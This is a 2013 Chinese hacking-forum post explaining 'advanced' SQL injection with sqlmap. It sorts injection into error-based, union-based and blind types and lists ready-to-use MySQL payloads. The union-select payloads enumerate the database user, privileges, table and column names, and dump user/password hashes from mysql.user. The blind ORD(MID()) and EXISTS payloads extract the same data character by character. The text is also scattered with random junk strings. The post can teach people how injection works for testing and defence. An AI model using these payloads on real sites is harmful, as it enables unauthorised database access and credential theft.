找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2414|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
( F9 g( b  {# [' T 0 `3 j% r6 Q$ Z9 b$ d. A
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
# \5 Q( w* y; C7 I5 |
% `; f2 B/ y) z# w/ T分类标准        分类        备注/ T8 b/ b5 X, M
按字段类型        整型注入,字符型注入       
1 e' }7 L" N1 o+ K按出现的位置        get注入,post注入,cookie注入,http header注入        & D6 _. ^, W: I9 p3 F/ a$ \+ c% m" U9 y
然而高级注入是这样的
( z1 J( a. L# y( F3 e7 T 9 B$ W4 W7 Y( ]; T( _* X$ m
高级注入分类        条件
4 Z9 b! H( S5 f. r) ]0 werror-based sql        数据库的错误回显可以返回,存在数据库,表结构
& h( T- }* I' @, h) `  k7 X% Punion-based sql        能够使用union,存在数据库,表结构# ^* _" C+ Y5 F' H
blind sql        存在注入
- |" a. _" B, d9 g" _, v% P我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。, H0 l* i0 M+ z2 f! l) o

$ `8 O0 \3 l. ~+ L* z# h好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
: w! T! K' w$ z) B) X0 B. x + M& e! Y6 E0 b3 r. Z) ?/ f) \
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。1 v$ g& f# a4 w: P6 i
2 a4 ]6 w. `( o7 ^; m
这里用mysql说明
$ F3 c1 Q0 Z: l2 l  G7 W1 ^+ ?" } 0 t3 s$ ?5 K1 }# W# L% U
e注入坛子里很多了,请看戳我或者再戳我! \# H7 @: q% ]6 p4 U4 r
9 f5 N/ Z4 W9 J% z, N1 d+ Q
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
$ _4 x4 N- A) N# B# k
6 Y. z6 S8 N# W获取当前数据库用户名
0 R# L+ B2 m; j8 u5 a( ~' U
+ l, g" M6 i/ e4 o& y8 ~% FUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
/ I, m( ^$ z+ a$ zAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
6 f: Y6 v! o; |% r4 Y& k, i% H2 bL, NULL## C, j! H# v9 A# d3 _, t% F
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。6 k4 L1 |9 O% O) k/ j2 f) w
  u9 F" p5 ~) y- K  K5 M% M
获取数据库名
8 ~3 x" M! }9 H, [' ]$ Y: X
& U2 K/ m7 V+ s: P& l) ^UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
& f3 u  D5 ]' K  W5 U获取所有用户名
3 r+ t  B  T3 Q8 E $ X: j; G& f1 {2 {6 O% P& u+ @7 K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
2 n7 s& W0 f1 n; [: Y, ?查看当前用户权限; y6 a0 [$ I' K/ o! ^

& A9 m! v, f$ h2 g5 q, TUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
7 a- ~5 I8 ]2 h- d0 e2 t尝试获取密码,当然需要有能读mysql数据库的权限
+ g% T% h, W3 j, m  b+ [4 n ) ]0 v2 Z) d8 d, v; v
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#  K( P/ p! _3 H; Q
获取表名,limit什么的自己搞啦
" T+ ?, Z; J' B! f% G+ G
+ ]+ X5 S$ B) [UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#$ {" S# s' T, z5 g
获取字段名及其类型
; ~! S: [( O2 k! ~6 KUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#8 G* ^1 q4 {  ^0 [' }2 A6 I9 l
% N$ u! r# v5 ~. T3 i
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。8 f  _- G3 O0 I! f$ P
& Z& i5 F2 X0 a8 y- F; Y
如:) ^* _8 i* {) d1 s6 J, l8 e
获取当前用户名
$ |* v2 c6 B* g" ?" q5 y( x# ]
! d) h: d4 i% r1 X. V8 y8 e0 `AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
7 u( Y" M* s, Y4 |$ n获取当前数据库, J+ D  f4 M* j7 z" ~

  L$ N  `! k- gAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
* ^/ J9 s6 K  W$ I+ _6 }! X0 K9 b获取表名
: P. P6 ^7 K5 ^" [ * m/ c: N( l0 S0 a8 O5 n, ^7 [7 z
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51* r, e& b% ]- o* |* l9 J( p( K
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。) ^8 ^- U9 e0 i* j& c
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。1 S* A. |. f! Q' ?1 T
爆表
/ j( P( \$ a7 Z. o! u+ V  r
. q+ _" X& v! k+ Z: hAND EXISTS(select * from table)
, b. R( O6 f% y% k( h# v' _6 e. R爆字段8 Q6 U  B3 j; A2 R# b! }% P1 O; M

- Y0 y% O3 M+ _- F; v5 a( ^4 `AND EXISTS(select pwd from table)
& B  v5 O7 X6 K盲注的变化就比较多了,由于篇幅,只是举个例子而已。4 L" M5 I: K- G; S- Z

& K! Q/ N9 j9 u: H9 @. v本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
* W& ?- J7 {' N: W0 q" Y# S6 w3 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表